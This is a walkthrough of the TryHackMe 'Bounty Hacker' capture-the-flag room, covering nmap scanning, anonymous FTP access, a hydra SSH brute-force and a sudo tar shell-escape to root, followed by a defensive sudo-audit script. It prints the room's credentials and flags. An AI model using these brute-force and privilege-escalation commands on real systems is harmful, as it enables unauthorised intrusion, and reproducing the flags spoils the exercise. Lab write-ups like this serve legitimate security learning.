TryHackMe | Bounty Hacker writeup
This is one (of many) walkthroughs for the Bounty Hacker CTF room. As always, I follow a few simple enumeration steps to expose the potential flaws, and this article records them.
Enumeration
As usual, I use nmap to see which ports are open.
nmap -sC -sV $IP_ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-11 16:34 GMT
Nmap scan report for ip-10-10-70-0.eu-west-1.compute.internal (10.10.70.0)
Host is up (0.00062s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.211.115
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:59:29:91:C0:FF (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.73 seconds
From this scan, you notice ftp as an exposed service. Additionally, the default-scripts flag (-sC) reveals that anonymous login is allowed. Wow! You can now access the ftp server.
$ ftp 10.10.70.0
Connected to 10.10.70.0.
220 (vsFTPd 3.0.3)
Name (10.10.70.0:root): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 07 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jun 07 2020 ..
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
ftp> get locks.txt
You quickly notice two txt files, which you can download with the get command. Later that day, I searched for a way to get all ftp files at once and found that mget does the trick. One of the files allowed me to answer the first question.
1. Who wrote the task list? lin
locks.txt, however, didn't answer the second question directly. That file looked like a list of passwords used for something, so I tried it as a wordlist with hydra.
2. What service can you bruteforce with the text file found? ssh
$ hydra -l lin -P locks.txt -vV $IP_ADDRESS ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
...
[22][ssh] host: 10.10.70.0 login: lin password: RedDr4gonSynd1cat3
[STATUS] attack finished for $IP_ADDRESS (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-01-11 16:50:12
3. What is the user's password? RedDr4gonSynd1cat3
With the credentials in hand, we can now access the server through ssh.
ssh lin@$IP_ADDRESS
The authenticity of host '$IP_ADDRESS' can't be established.
lin@10.10.70.0's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
lin@bountyhacker:~/Desktop$
4. user.txt THM{CR1M3_SyNd1C4T3}
Privilege escalation
The remainder of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to run through sudo as lin.
lin@bountyhacker:~$ sudo -l
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
GTFOBins has a tar entry that spawns a shell as root. The prize is in the previously forbidden /root folder.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
5. root.txt THM{80UN7Y_h4cK3r}
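As an added defensive check, not part of the original writeup: a small Python audit that parses sudo -l output like the one above and flags entries such as (root) /bin/tar, whose binary can run arbitrary commands unless sudoers pins its arguments or sets NOEXEC. The shell-capable binary list, the sample inputs and the hardened entry are constructed for this example.

```python
import re

# Binaries that let a sudo user run arbitrary commands (tar via
# --checkpoint-action=exec=..., as above). Assumed subset; see GTFOBins.
SHELL_CAPABLE = {"tar", "vim", "vi", "less", "more", "find", "awk", "perl",
                 "python", "python3", "env", "bash", "sh", "zip"}
# One privilege line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
SUDO_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

def parse_sudo_l(output: str) -> list[dict]:
    """Return the privilege entries listed after 'User X may run ...'."""
    entries, in_cmds = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = SUDO_LINE.match(line) if in_cmds else None
        if not m:
            continue
        tags = re.findall(r"[A-Z]+", m.group("tags"))
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                entries.append({"runas": m.group("runas").strip(),
                                "tags": tags, "command": cmd.strip()})
    return entries

def audit(output: str) -> list[str]:
    """Flag entries that let the user escape to a shell as the runas user."""
    findings = []
    for e in parse_sudo_l(output):
        cmd, runas, tags = e["command"], e["runas"], e["tags"]
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        pinned = len(cmd.split()) > 1          # sudoers fixes the arguments
        if cmd == "ALL":
            findings.append(f"{runas}: ALL commands allowed")
        elif binary in SHELL_CAPABLE and not ("NOEXEC" in tags or pinned):
            findings.append(f"{runas}: {cmd} can spawn a shell; pin its arguments or add NOEXEC")
        if "NOPASSWD" in tags:
            findings.append(f"{runas}: {cmd} runs without a password")
    return findings

# Constructed samples: the weak entry from this room and a hardened form of it.
WEAK = """Matching Defaults entries for lin on bountyhacker:
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
"""
HARDENED = """User lin may run the following commands on bountyhacker:
    (root) NOEXEC: /bin/tar -cf /var/backups/home.tar /home
"""
```

The NOEXEC tag makes sudo block child-process execution for dynamically linked programs such as tar, which is exactly what --checkpoint-action=exec relies on.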
Conclusion
Surprisingly, this CTF was pretty smooth! Going through several THM modules and learning lots of techniques from them prepared me to face and solve this exercise. Kudos to sevuhl for creating this one! 👍